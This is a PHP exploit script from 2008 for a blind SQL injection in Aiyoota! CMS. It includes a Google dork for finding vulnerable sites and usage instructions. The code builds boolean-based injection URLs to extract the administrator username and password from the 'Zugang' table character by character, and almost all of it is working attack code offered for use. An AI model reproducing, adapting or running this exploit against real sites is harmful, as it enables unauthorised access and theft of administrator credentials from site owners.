Aiyoota! CMS remote blind SQL injection exploit.
5fe1f519e4f3e8d6131052331a1e2520afba7ff252c5e3d08ca8a8fedffe9878
<?php
ini_set("max_execution_time",0);
ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
print_r('
###############################################################
#
# Aiyoota! CMS - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# Palme, GPM, Free-Hack
# Date: 16.12.2008
#
###############################################################
#
# Dork: inurl:naviid + inurl:liste9
# Admin Panel: [Target]/cms/
# Usage (Method 1 auto): php '.$argv[0].' -1 [Target]
# Usage (Method 2 manually): php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file]
# Example (Method 1) for http://www.site.com
# => php '.$argv[0].' -1 http://www.site.com
# Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html
# => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html
#
###############################################################
');
$automatic = $argv[1];
$url = $argv[2];
if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) {
if ($argv[1] == "-1") {
$source = file_get_contents($url."/index.html");
$buffer = $source;
if (strpos($source,"a href='$url/") != 0) {
$place = strpos($source,"a href='$url/");
$sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/"));
$urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'"));
} else {
while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") {
$buffer = substr($buffer,strpos($buffer,"a href='/"));
}
$place = strpos($buffer, "a href='/");
$sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/"));
$urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'"));
}
$varstart = strpos($urlpart,$sprache)+strlen($sprache)+1;
$injplace = strpos(substr($urlpart,$varstart),"/") + $varstart;
$part1 = substr($urlpart,0,$injplace);
$part2 = substr($urlpart,$injplace);
} elseif ($argv[1] == "-2") {
$part1 = $url."/".$argv[3]."/".$argv[4];
$part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7];
}
echo "\nExploiting now!\n\n";
$true = file_get_contents($part1."+and+1=1".$part2);
$false = file_get_contents($part1."+and+1=0".$part2);
$inj = $false;
$tbl = array("benutzer","passwort");
if (strlen($false) != strlen($true)) {
for ($mode = 0; $mode <= 1; $mode++) {
echo $tbl[$mode].": ";
while ($break == 0) {
$count++;
$injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2);
$injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2);
$injpart3 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2);
$injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2);
$injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2);
if (strlen($false) / strlen($injpart1) * 100 < 98) {
if (strlen($false) / strlen($injpart2) * 100 < 98) {
$border1 = 103;
$border2 = 122;
} else {
$border1 = 96;
$border2 = 108;
}
}
if (strlen($false) / strlen($injpart3) * 100 < 98) {
if (strlen($false) / strlen($injpart4) * 100 < 98) {
if (strlen($false) / strlen($injpart5) * 100 < 98) {
$border1 = 47;
$border2 = 57;
} else {
$border1 = 59;
$border2 = 69;
}
} else {
$border1 = 70;
$border2 = 96;
}
}
for ($i = $border1; $i<=$border2; $i++) {
$zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2);
if (strlen($false) / strlen($zero) * 100 < 98) {
$break = 1;
echo "\n";
$i = $border2+1;
} else {
$inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2);
if ((strlen($inj) / strlen($true) * 100) < 98) {
echo chr($i);
$i = $border2+1;
}
}
}
}
$break = 0;
$count = 0;
}
}
} else {
echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n";
}
?>